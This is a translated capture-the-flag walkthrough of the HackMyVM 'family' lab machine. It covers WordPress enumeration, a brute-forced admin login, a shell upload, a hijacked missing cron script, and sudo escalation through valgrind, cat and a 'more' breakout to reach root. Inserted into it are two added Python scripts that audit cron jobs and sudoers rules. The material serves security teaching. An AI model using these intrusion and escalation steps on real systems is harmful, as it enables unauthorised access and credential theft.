hackmyvm-family

admin | 2025-04-09 20:38:47 | 8 views | 5988 characters | reading time 19 min 57 s


ssh://192.168.69.31         ssh                        Info:protocol2.0,Port:22,ProductName:OpenSSH,Version:7.9p1Debian10+deb10u2,Digest:"SSH-2.0-OpenSSH_7.9p1D,OperatingSystem:Linux,Length:41

http://192.168.69.31        Indexof/                   Port:80,Digest:nApach,Length:905,FingerPrint:列目录;Apache;Index-Of;开源-WordPress

As you can see, it is another WordPress site.

[+] URL: http://192.168.69.31/wordpress/ [192.168.69.31]
[+] Started: Mon Mar 31 22:09:25 2025

Interesting Finding(s):

[+] Headers
 | Interesting Entry: Server: Apache/2.4.38 (Debian)
 | Found By: Headers (Passive Detection)
 | Confidence: 100%

[+] XML-RPC seems to be enabled: http://192.168.69.31/wordpress/xmlrpc.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%
 | References:
 |  - http://codex.wordpress.org/XML-RPC_Pingback_API
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
 |  - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/

[+] WordPress readme found: http://192.168.69.31/wordpress/readme.html
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] Upload directory has listing enabled: http://192.168.69.31/wordpress/wp-content/uploads/
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] The external WP-Cron seems to be enabled: http://192.168.69.31/wordpress/wp-cron.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 60%
 | References:
 |  - https://www.iplocation.net/defend-wordpress-from-ddos
 |  - Issue #1299 · wpscanteam/wpscan

[+] WordPress version 5.7.1 identified (Insecure, released on 2021-04-15).
 | Found By: Emoji Settings (Passive Detection)
 |  - http://192.168.69.31/wordpress/, Match: 'wp-includes/js/wp-emoji-release.min.js?ver=5.7.1'
 | Confirmed By: Meta Generator (Passive Detection)
 |  - http://192.168.69.31/wordpress/, Match: 'WordPress 5.7.1'

[i] The main theme could not be detected.

[+] Enumerating Vulnerable Plugins (via Passive Methods)

[i] No plugins Found.

[+] Enumerating Vulnerable Themes (via Passive and Aggressive Methods) Checking Known Locations - Time: 00:00:01 <===================================================================================================================> (652 / 652) 100.00% Time: 00:00:01

[i] No themes Found.

[+] Enumerating Timthumbs (via Passive and Aggressive Methods) Checking Known Locations - Time: 00:00:02 <=================================================================================================================> (2568 / 2568) 100.00% Time: 00:00:02

[i] No Timthumbs Found.

[+] Enumerating Config Backups (via Passive and Aggressive Methods) Checking Config Backups - Time: 00:00:00 <====================================================================================================================> (137 / 137) 100.00% Time: 00:00:00

[i] No Config Backups Found.

[+] Enumerating DB Exports (via Passive and Aggressive Methods) Checking DB Exports - Time: 00:00:00 <==========================================================================================================================> (75 / 75) 100.00% Time: 00:00:00

[i] No DB Exports Found.

[+] Enumerating Medias (via Passive and Aggressive Methods) (Permalink setting must be set to "Plain" for those to be detected) Brute Forcing Attachment IDs - Time: 00:00:04 <===============================================================================================================> (100 / 100) 100.00% Time: 00:00:04

[i] No Medias Found.

[+] Enumerating Users (via Passive and Aggressive Methods) Brute Forcing Author IDs - Time: 00:00:00 <=====================================================================================================================> (10 / 10) 100.00% Time: 00:00:00

[i] User(s) Identified:

[+] admin
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)

[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register

[+] Finished: Mon Mar 31 22:09:56 2025
[+] Requests Done: 3581
[+] Cached Requests: 4
[+] Data Sent: 1.028 MB
[+] Data Received: 574.631 KB
[+] Memory used: 267.664 MB
[+] Elapsed time: 00:00:31

Brute-forcing the user ran into a small problem; it seems the hosts file needs to be configured.

[SUCCESS] - admin / phantom
Trying admin / phantom Time: 00:02:36 <                    > (2010 / 15039185)  0.01%  ETA: ??:??:??

[!] Valid Combinations Found:
 | Username: admin, Password: phantom

Log in as before, upload a shell, and catch a reverse shell: the usual routine.

Check the MySQL credentials in wp-config.php:

/** MySQL database user. */
define( 'DB_USER', 'admin' );

/** MySQL database password. */
define( 'DB_PASSWORD', 'phantom' );

There is a .bash_history under /var/www:

export TERM=xterm
clear
cd /home
ls
cd baby
cd mother
cd father
clear
find / -group www-data -type f 2>/dev/null | grep -v /var/www
find / -group www-data -type f 2>/dev/null | grep -v -E "/var/www|proc"
cat /usr/share/perl/5.28.1/perso.txt
ls -l /usr/share/perl/5.28.1/perso.txt
su - father
export TERM=xterm
clear
sudo -l

The password in perso.txt is

uncrackablepassword

so we can su - father.

Logged in as father, we can look into mother's home directory.

There is a .selected_editor file:

# Generated by /usr/bin/select-editor
SELECTED_EDITOR="/bin/nano"

Nothing useful there.

sudo -l shows nothing either.

Let's have a look with pspy64.

[screenshot: hackmyvm-family, pspy64 output]

There is a cron job that runs check.py, but the file does not exist, so it can be used to get a reverse shell.

The reverse shell gives us mother's privileges; now look for a way to escalate.
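A cron job whose script is missing (or writable by someone other than its owner) is exactly the condition a defender wants to catch before anyone else does. The following audit script is an added example, not part of the original write-up: it parses crontab-style lines, works out which file each job really executes, and flags targets that do not exist or are group/world-writable. The crontab text, the file names (check.py, backup.sh, rotate.py) and the temporary directory are all constructed for the example; they are not the box's real paths.

```python
"""Cron audit: flag scheduled commands whose target script is missing or
writable by others.

Added example (not part of the original write-up). The crontab text and
the files it points to are constructed inside a temporary directory so the
script runs offline; the paths are placeholders, not the box's real paths.
"""
import os
import shlex
import stat
import tempfile

# Interpreters whose real payload is the script given as the first
# non-option argument (e.g. "/usr/bin/python3 /home/x/check.py").
INTERPRETERS = {"python", "python2", "python3", "bash", "sh", "perl", "php", "ruby"}

WRITABLE_BY_OTHERS = stat.S_IWGRP | stat.S_IWOTH


def target_of(command):
    """Return the file a cron command actually executes, or None."""
    try:
        argv = shlex.split(command)
    except ValueError:
        return None
    if not argv:
        return None
    if os.path.basename(argv[0]) in INTERPRETERS:
        if "-c" in argv[1:]:
            return None  # inline code, no script file to check
        for arg in argv[1:]:
            if not arg.startswith("-"):
                return arg
        return None
    return argv[0]


def parse_crontab(text, system=False):
    """Yield (user, command) for each job line.

    System crontabs (/etc/crontab, /etc/cron.d/*) carry a user field after
    the five time fields; per-user crontabs do not. Comments and environment
    assignments such as SHELL=/bin/sh are skipped."""
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        if "=" in line.split(None, 1)[0]:
            continue
        if line.startswith("@"):        # @reboot, @daily, ...
            n = 2 if system else 1
        else:                           # min hour dom mon dow
            n = 6 if system else 5
        fields = line.split(None, n)
        if len(fields) <= n:
            continue                    # malformed line or empty command
        user = fields[n - 1] if system else None
        yield user, fields[n]


def audit(text, system=False):
    """Return [(user, command, problem)] for jobs that could be hijacked."""
    findings = []
    for user, command in parse_crontab(text, system):
        path = target_of(command)
        if path is None or not os.path.isabs(path):
            findings.append((user, command,
                             "target is not an absolute path; resolved via PATH or inline code"))
            continue
        if not os.path.exists(path):
            problem = "target does not exist"
            parent = os.path.dirname(path)
            if os.path.isdir(parent) and os.stat(parent).st_mode & WRITABLE_BY_OTHERS:
                problem += " and its directory is group/world-writable"
            findings.append((user, command, problem))
            continue
        if os.stat(path).st_mode & WRITABLE_BY_OTHERS:
            findings.append((user, command, "target is group/world-writable"))
    return findings


def demo():
    """Build a constructed system crontab plus its target files and audit it."""
    tmp = tempfile.mkdtemp()
    present = os.path.join(tmp, "backup.sh")
    with open(present, "w") as fh:
        fh.write("#!/bin/sh\nexit 0\n")
    os.chmod(present, 0o755)
    loose = os.path.join(tmp, "rotate.py")
    with open(loose, "w") as fh:
        fh.write("print('rotate')\n")
    os.chmod(loose, 0o666)                   # deliberately world-writable
    missing = os.path.join(tmp, "check.py")  # never created, like the box's check.py
    crontab = (
        "# constructed system crontab for the example\n"
        "SHELL=/bin/sh\n"
        f"*/1 * * * * mother /usr/bin/python3 {missing}\n"
        f"0 2 * * *   root   /bin/sh {present}\n"
        f"@reboot     root   python3 {loose}\n"
    )
    return audit(crontab, system=True)


if __name__ == "__main__":
    for user, command, problem in demo():
        print(f"[{user}] {problem}: {command}")
```

A missing target is reported even when its directory is not writable by others, because whoever owns that directory (on the box, the same user the job runs as) can create the file; the writable-directory note only adds the case where any group member or any local user could do it.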

User mother may run the following commands on family:
    (baby) NOPASSWD: /usr/bin/valgrind
mother@family:~$

Escalating through valgrind is straightforward:

sudo -u baby valgrind bash gives us a shell as baby.

Get user.txt: Chilatyfile

[screenshot: hackmyvm-family, user.txt]

Then look at escalating from baby.

User baby may run the following commands on family:
    (ALL : ALL) NOPASSWD: /usr/bin/cat
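Both sudo rules on this box (valgrind for mother, cat for baby) share the same defects: a program that hands over a shell or reads any file, no argument restriction, and NOPASSWD. The following sudoers audit is an added example, not part of the original write-up; it parses user specifications from sudoers text and reports rules with those properties. SAMPLE is a constructed sudoers fragment modelled on the two rules shown above, and the SHELL_ESCAPE and READ_ANY lists are short and illustrative rather than a complete catalogue.

```python
"""Sudoers audit: flag rules that hand out a shell or arbitrary file reads.

Added example (not part of the original write-up). SAMPLE is a constructed
sudoers fragment modelled on the two rules in the write-up; the binary
lists are illustrative, not exhaustive.
"""
import os
import re

# user  host=(runas) [TAG:]... command[, command]...
SPEC = re.compile(
    r"^(?P<who>\S+)\s+(?P<host>[^=\s]+)\s*=\s*"
    r"(?:\((?P<runas>[^)]*)\)\s*)?(?P<rest>.+)$"
)
TAG = re.compile(
    r"^(NOPASSWD|PASSWD|NOEXEC|EXEC|SETENV|NOSETENV|LOG_INPUT|NOLOG_INPUT|"
    r"LOG_OUTPUT|NOLOG_OUTPUT|MAIL|NOMAIL|FOLLOW|NOFOLLOW|INTERCEPT|NOINTERCEPT):\s*"
)

# Programs that run, or let the operator type into, an interactive shell:
# valgrind executes whatever program it is given; pagers and editors have
# a "!" escape, as the write-up's "more" trick shows.
SHELL_ESCAPE = {"valgrind", "more", "less", "vi", "vim", "nano", "bash", "sh"}
# Programs that print any file the run-as user can read.
READ_ANY = {"cat", "head", "tail"}

SAMPLE = """\
# constructed sudoers fragment for the example
Defaults        env_reset
root    ALL=(ALL:ALL) ALL
mother  ALL=(baby) NOPASSWD: /usr/bin/valgrind
baby    ALL=(ALL : ALL) NOPASSWD: /usr/bin/cat
backup  ALL=(root) /usr/bin/rsync -a /srv/data/ /backup/
"""


def parse_sudoers(text):
    """Yield (user, host, runas, tags, commands) per user specification.

    Defaults, alias definitions, include directives and comments are
    skipped. A rule without (runas) defaults to root, as sudo does."""
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line or line.startswith(("Defaults", "Cmnd_Alias", "User_Alias",
                                        "Host_Alias", "Runas_Alias", "@")):
            continue
        m = SPEC.match(line)
        if not m:
            continue
        rest = m.group("rest")
        tags = []
        while True:
            t = TAG.match(rest)
            if not t:
                break
            tags.append(t.group(1))
            rest = rest[t.end():]
        commands = [c.strip() for c in rest.split(",") if c.strip()]
        runas = (m.group("runas") or "root").strip()
        yield m.group("who"), m.group("host"), runas, tags, commands


def audit(text):
    """Return one finding dict per risky command in a rule.

    Rules for root itself are skipped: "root ALL=(ALL:ALL) ALL" is the
    normal baseline, not a finding."""
    findings = []
    for who, host, runas, tags, commands in parse_sudoers(text):
        if who == "root":
            continue
        for cmd in commands:
            if cmd.startswith("!"):
                continue  # negated entries remove rights, they do not grant them
            prog = "ALL" if cmd == "ALL" else os.path.basename(cmd.split()[0])
            reasons = []
            if prog == "ALL" or prog in SHELL_ESCAPE:
                reasons.append(f"gives an interactive shell as {runas}")
            elif prog in READ_ANY:
                reasons.append(f"reads any file as {runas}")
            if not reasons:
                continue
            if "NOPASSWD" in tags:
                reasons.append("no password required")
            if prog != "ALL" and " " not in cmd:
                reasons.append("no argument restriction")
            findings.append({"user": who, "runas": runas, "command": cmd,
                             "reasons": reasons})
    return findings


if __name__ == "__main__":
    for f in audit(SAMPLE):
        print(f"{f['user']} -> {f['command']} ({f['runas']}): " + "; ".join(f["reasons"]))
```

The usual fix for both rules is to grant a wrapper script with fixed arguments instead of the bare binary, and to drop NOPASSWD; the rsync rule in SAMPLE, which pins its arguments, is what a reasonable delegation looks like and produces no finding.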

This one is even cruder:

sudo /usr/bin/cat /root/.ssh/id_rsa

After logging in, a logo is displayed and the session exits automatically.

So the idea was to enter a non-interactive session from the command line:

ssh -i id_rsa [email protected] /bin/bash

Tried it; it does not work. I was overthinking it.

The right way is to type !/bin/bash while more is showing the logo to break out.

[screenshot: hackmyvm-family, root shell]

Found flag.txt: Selmorbormir

Target system information

  • SSH service

    • Address: ssh://192.168.69.31:22
    • Protocol: SSH-2.0
    • Version: OpenSSH 7.9p1 Debian 10+deb10u2
    • Operating system: Linux
  • HTTP service

    • Address: http://192.168.69.31:80
    • Web server: Apache/2.4.38 (Debian)
    • Directory listing exposed: /wordpress/wp-content/uploads/
    • WordPress version: 5.7.1 (known vulnerabilities)

Key findings

  1. WordPress weaknesses

    • XML-RPC interface open (potential DDoS / brute-force risk)
    • Readable readme.html exposes version information
    • External WP-Cron enabled (can be abused)
  2. User credentials

    • Brute-forced: user admin / password phantom
    • MySQL credentials: user admin / password phantom
  3. Privilege escalation path

    • Password uncrackablepassword found via .bash_history → switched to user father
    • Cron job (check.py not found, but a reverse shell can be obtained through it)
    • User mother can escalate to baby via valgrind
    • User baby has passwordless sudo cat, which finally reads /root/.ssh/id_rsa

Privilege escalation result

  • Root access obtained

    • Logging in with the SSH private key triggers an automatic logout; bypassed with a non-interactive approach (e.g. executing !/bin/bash inside more).
    • Root flag finally obtained: Selmorbormir

Originally published on the WeChat public account BlueIris: hackmyvm-family

Disclaimer: the programs (methods) discussed in this article may be offensive in nature and are provided solely for security research and teaching. Readers who use this information for any other purpose bear full legal and joint liability; this site assumes no legal or joint liability. For any questions, contact us by e-mail (preferably from a corporate or otherwise valid mailbox to avoid filtering; contact details are on the home page).
Source link (CN-SEC): https://cn-sec.com/archives/3935028.html